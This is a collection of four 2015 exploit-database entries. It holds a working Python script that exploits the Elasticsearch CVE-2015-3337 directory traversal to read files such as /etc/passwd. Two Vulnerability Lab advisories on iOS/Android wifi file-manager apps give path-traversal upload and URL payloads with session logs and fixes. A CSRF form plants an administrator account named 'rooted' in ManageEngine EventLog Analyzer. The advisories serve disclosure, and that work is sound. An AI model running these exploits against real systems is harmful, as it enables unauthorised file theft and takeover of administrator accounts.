import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"

if len(sys.argv) <> 3:
    print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
    sys.exit()

port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
    # Requests fpath via the plugin route and prints the raw response when
    # its status line is "HTTP/1.0 200 OK".
    # NOTE(review): the socket is never closed, a single recv(2048) is all
    # that is read, and connection errors are not caught here (unlike in
    # pfind()), so a timeout propagates as an uncaught exception.
    socket.setdefaulttimeout(3)
    s = socket.socket()
    s.connect((host,port))
    # Adjacent literals are concatenated before the '%' is applied.
    s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
           "Host: %s\n\n" % (plugin, fpath, host))
    file = s.recv(2048)  # shadows the Python 2 builtin 'file'
    print " [*] Trying to retrieve %s:" % fpath
    if ("HTTP/1.0 200 OK" in file):
        print "\n%s" % file
    else:
        print "[-] File Not Found, No Access Rights or System Not Vulnerable"

def pfind(plugin):
    # Checks whether /_plugin/<plugin>/ answers 200; on the first hit calls
    # grab() and exits.  Only the first 16 bytes of the reply are read, which
    # is enough to cover the status line.
    # NOTE(review): the socket is never closed.  sys.exit() raises SystemExit,
    # which is not an Exception subclass, so the handler below does not
    # intercept it.
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/ HTTP/1.0\n"
               "Host: %s\n\n" % (plugin, host))
        file = s.recv(16)  # shadows the Python 2 builtin 'file'
        print "[*] Trying to find plugin %s:" % plugin
        if ("HTTP/1.0 200 OK" in file):
            print "[+] Plugin found!"
            grab(plugin)
            sys.exit()
        else:
            print "[-] Not Found "
    except Exception, e:
        # Any socket error (refused, timeout, DNS) ends the whole run.
        print "[-] Error connecting to %s: %s" % (host, e)
        sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
    pfind(plugin)
-
Wireless Photo Transfer 3.0 iOS - Local File Inclusion
Document Title: =============== Wireless Photo Transfer v3.0 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1492 Release Date: ============= 2015-05-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1492 Common Vulnerability Scoring System: ==================================== 6.5 Product & Service Introduction: =============================== Transfer your photo without usb. The best wireless photo transfer app on the App Store. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application. Vulnerability Disclosure Timeline: ================================== 2015-05-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Yan Xing Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application. The file include vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in the index file dir listing and sub folders of the wifi interface. 
The attacker is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename (album-title) Affected Module(s): [+] Index File Dir Listing (http://localhost:80/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 
PoC: #1 Index File Dir Listing (album-title) <div class="album-folder"> <div class="album-number">2 items</div> <div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a> </a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140"> <img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a> <div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div> </div> PoC: #2 Topic Album (Album Title - album_info_intro_driver) <div class="top-section"> <div id="intro"> <div class="divider"> <h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a> <div class="pagination"></div> </a></div><a> </a></div><a> </a><div class="centered"><a> </a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a> <a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a> </div> </div> --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:80/upload.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:80] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:80/groups] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------8397114799830 Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png" Content-Type: image/png - Status: 200[OK] GET http://localhost:80/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:80] 
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[210] Connection[keep-alive] Date[Sat, 09 May 2015 15:21:30 GMT] Reference(s): http://localhost:80/groups http://localhost:80/upload.html Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync. Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output values in the mobile wifi interface (file dir) application. Security Risk: ============== The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
-
OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities
Document Title: =============== OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1494 Release Date: ============= 2015-05-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1493 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos. Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Balaji Rajan Product: OYO File Manager - iOS & Android 1.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 Local File Include Vulnerability A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. 
Attackers are able to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. Note that the PoC below places a `../` sequence in the multipart `filename`; what is actually demonstrated is a path traversal on the upload destination (the file is not confined to the requested `path` folder) combined with the unescaped rendering of that filename in the directory listing, rather than a code include in the PHP sense. The local file/path include execution occurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function. Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] upload (GCDWebUploader) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:8080/) 1.2 Local Command Injection Vulnerability A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application. The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject their own malicious payload into the vulnerable `devicename` value. The devicename value is displayed in the header location of the file dir index module. Note: the PoC below only shows the device name being rendered unescaped into the HTML of the index page; the impact actually demonstrated is therefore persistent script injection (stored XSS) in the web interface, not execution of operating-system commands on the device. 
The execution point is in the main index context and the injection point is the local device to app sync. The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application or the connected device components. Request Method(s): [+] [SYNC] Vulnerable Module(s): [+] Path Listing Vulnerable Parameter(s): [+] devicename 1.3 Remote Path Traversal Vulnerability A Path Traversal web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. The security vulnerability allows remote attackers to request files and directories outside the intended root directory, because the `path` value is not confined to the shared folder, to compromise the mobile application or device. The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable to request device files or directories they are not authorized to see. The vulnerability can be exploited by local or remote attackers without user interaction. The attack vector is located on the application-side of the service and the request method to execute is GET (client-side). The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. 
Successful exploitation of the vulnerability results in mobile application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] open [+] list Vulnerable Parameter(s): [+] path Affected Module(s): [+] Index File Dir Listing (http://localhost:8080/) Proof of Concept (PoC): ======================= 1.1 The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the interface 2. Start a session tamper 3. Upload a reandom file 4. Change in the upload POST method request the vulnerable filename to a local file variable Note: The website reloads 5. The execution occurs in the main file dir index were the upload has been replaced 6. Successful reproduce of the mobile web vulnerability! --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost/upload Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost/] Content-Length[831] Content-Type[multipart/form-data; boundary=---------------------------33361466725643] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: POST_DATA[-----------------------------33361466725643 Content-Disposition: form-data; name="path"/test23/ -----------------------------33361466725643 Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png" Content-Type: image/png - Response Status=OK - 200 Server=GCDWebUploader Cache-Control=no-cache Content-Length=2 Content-Type=application/json 
Connection=Close Date=Tue, 12 May 2015 12:24:23 GMT Reference(s): http://localhost/upload 1.2 The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the android or ios application to your device 2. Start the application 3. Change the local devicename value in the ios settings to your own payload string (e.g. an HTML/script fragment) 4. Save the settings 5. Open the wifi interface and watch the index webserver site 6. The execution occurs in the header location of the webpage where the devicename value is visible 7. Successful reproduce of the mobile web vulnerability! PoC: <spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span> </span> <span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span> <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span> <span style="float:right;font-size:18px;width:400px;"> <div class="progress"> <div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%"> 25.89 GB used</div> <!-- <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>--> <!-- Drag & drop files OR Just upload your Files--> <div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%"> 1.30 GB free space </div></div></span></spna> (The PoC above is the rendered index page as served by the app; the `[LOCAL COMMAND INJECT VULNERABILITY!]23` text is the position where the device name is inserted into the markup without HTML encoding.) 1.3 The path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 
PoC: Payload(s) http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ --- PoC Session Logs [GET] --- Status: 200[OK] GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost/] Connection[keep-alive] Response Header: Server[GCDWebUploader] Cache-Control[no-cache] Content-Length[59] Content-Type[application/json] Connection[Close] Date[Tue, 12 May 2015 12:24:25 GMT] 14:21:43.214[9ms][total 9ms] Status: 200[OK] GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost/] Connection[keep-alive] Response Header: Etag[8831597/1431433463/0] Last-Modified[Tue, 12 May 2015 12:24:23 GMT] Server[GCDWebUploader] Content-Type[image/png] Content-Length[538] Connection[Close] Date[Tue, 12 May 2015 12:24:25 GMT] Cache-Control[no-cache] Reference(s): http://localhost/list?path= http://localhost/open?path= http://localhost/download?path= Note on the evidence: the logged `list` response is a 59-byte JSON document and the `open` response is a 538-byte PNG whose Last-Modified timestamp (12:24:23) matches the upload made in the 1.1 PoC, so it appears to be the file uploaded there. These logs show that the `../` sequences and the mixed-in `%22%3E%3C...%3E` characters are accepted in `path`, but they do not by themselves prove that content outside the application's data root was returned. To confirm traversal, request a file known to exist outside the shared directory and compare the response with a request for the same name inside it. Solution - Fix & Patch: ======================= 1.1 The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. 
Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload. Concretely: keep only the base name of the uploaded file (reject any path separator or `..` component), resolve the resulting destination and verify it is still inside the configured upload root before writing, and HTML-escape the stored filename when rendering the directory listing. 1.2 Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks. Since the device name is supplied by the device owner and rendered into the page header, the reliable fix is context-aware output encoding (HTML-escape the value at the point where it is inserted into the markup) rather than input filtering alone. 1.3 The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context. Encode the input of files to folders and disallow special chars. Implement a whitelist or an exception to prevent unauthorized path value requests via GET method. A blacklist of special characters is not sufficient on its own: canonicalize the requested path (resolve `.`, `..` and symbolic links) and reject the request unless the canonical result is still within the configured share root. Security Risk: ============== 1.1 The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5) 1.2 The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as medium. (CVSS 5.6) 1.3 The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
-
ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery
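<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link: https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL

Notes (review):
- The request below is a state-changing POST to /event/userManagementForm.do
  that carries no anti-CSRF token field; every parameter is a fixed value an
  attacker can predict, so a browser that is logged in to the console will
  send it together with the victim's session cookie.
- Preconditions: the victim must be authenticated to the EventLog Analyzer web
  console in the same browser with a role that may add users (i.e. an
  administrator), and 127.0.0.1:8400 must be replaced by the real host:port of
  the console under test.
- Effect: adds a new user "rooted" with password "admin" in the Administrator
  group. Remove that account when cleaning up after an authorised test.
- The form as written needs a click on the submit button; an attacker's page
  would typically submit it automatically (e.g. a script calling
  document.forms[0].submit() on load) so the victim sees nothing.
- The meaning of the fixed values currentUserId=1, licType=Prem and
  isAdminServer=false is not documented here; they were presumably captured
  from a legitimate "Add User" request - confirm against a live instance.
- Remediation: a per-session synchronizer token (or SameSite session cookies)
  on all state-changing requests, with Origin/Referer validation as defence in
  depth.
-->
<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
  <input type="hidden" name="domainId" value="" />
  <input type="hidden" name="roleId" value="" />
  <input type="hidden" name="addField" value="true" />
  <input type="hidden" name="userType" value="Administrator" />
  <input type="hidden" name="userName" value="rooted" />
  <input type="hidden" name="pwd1" value="admin" />
  <input type="hidden" name="password" value="admin" />
  <input type="hidden" name="userGroup" value="Administrator" />
  <input type="hidden" name="email" value="" />
  <input type="hidden" name="AddSubmit" value="Add User" />
  <input type="hidden" name="alpha" value="" />
  <input type="hidden" name="userIds" value="" />
  <input type="hidden" name="roleName" value="" />
  <input type="hidden" name="selDevices" value="" />
  <input type="hidden" name="doAction" value="" />
  <input type="hidden" name="productName" value="eventlog" />
  <input type="hidden" name="licType" value="Prem" />
  <input type="hidden" name="next" value="" />
  <input type="hidden" name="currentUserId" value="1" />
  <input type="hidden" name="isAdminServer" value="false" />
  <input type="submit" value="Click Me" />
</form>
</body>
</html>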